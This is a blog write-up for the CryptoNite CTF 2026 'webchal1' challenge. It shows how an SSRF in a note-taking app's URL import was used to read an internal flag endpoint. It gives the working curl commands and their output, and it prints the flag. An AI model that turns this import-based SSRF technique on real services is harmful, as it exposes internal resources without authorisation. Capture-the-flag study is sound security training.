244 words
1 minutes
CryptoNite CTF 2026 - webchal1 - Web Exploitation Writeup
Event Archive

CryptoNite CTF 2026

Posts, writeups, and notes grouped under this event.

Archive/8 posts
Events/CryptoNite CTF 2026
2026-03-10
Writeup
CTF
/
Security
/
Web Exploitation

Category: Web Exploitation Flag: TACHYON{5SrF_inj3ct10N_c0ol_123wed3}

Challenge Description#

Checkout this cool note-taking website we made

Everything about the challenge is in the website itself. https://webchal1.vercel.app/

Analysis#

The app was a note-taking site with an import feature, so the first thing I checked was the challenge page hint to see what was actually protected. It explicitly pointed at an internal flag endpoint and confirmed the expected flag format, which immediately suggested SSRF through the import flow.

curl -s "https://webchal1.vercel.app/challenge" | rg -o "(/api/internal/flag|TACHYON\{\.\.\.\}|internal endpoint)"
/api/internal/flag
TACHYON{...}
/api/internal/flag
TACHYON{...}

At that point, I verified how the frontend actually submits imports by checking the client chunk used by /import. Seeing /api/notes/import in the bundle gave the exact backend route to hit directly.

curl -s "https://webchal1.vercel.app/_next/static/chunks/97ef6067a1b24432.js" | rg -o "/api/notes/import"
/api/notes/import

From there, the solve was clean: send the importer a URL pointing to the internal flag API on the same host, keep the same session cookie, and read back notes to extract the flag pattern. It worked right away, which felt very satisfying.

smile

curl -s -c "/tmp/webchal1.cookies" -X POST "https://webchal1.vercel.app/api/notes/import" -H "Content-Type: application/json" -d '{"url":"https://webchal1.vercel.app/api/internal/flag"}' && echo && curl -s -b "/tmp/webchal1.cookies" "https://webchal1.vercel.app/api/notes" | rg -o "TACHYON\{[^}]+\}"
{"id":3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}

The core bug is server-side URL fetching without internal-resource protection. The importer can be used as an SSRF primitive to access /api/internal/flag, and the fetched response is stored as a note that can be read back.

Solution#

curl -s -c "/tmp/webchal1.cookies" -X POST "https://webchal1.vercel.app/api/notes/import" -H "Content-Type: application/json" -d '{"url":"https://webchal1.vercel.app/api/internal/flag"}' && echo && curl -s -b "/tmp/webchal1.cookies" "https://webchal1.vercel.app/api/notes" | rg -o "TACHYON\{[^}]+\}"
{"id":3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
CryptoNite CTF 2026 - webchal1 - Web Exploitation Writeup
https://blog.rei.my.id/posts/77/cryptonite-ctf-2026-webchal1-web-exploitation-writeup/
Author
Reidho Satria
Published at
2026-03-10
License
CC BY-NC-SA 4.0
© 2026 Reidho Satria. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari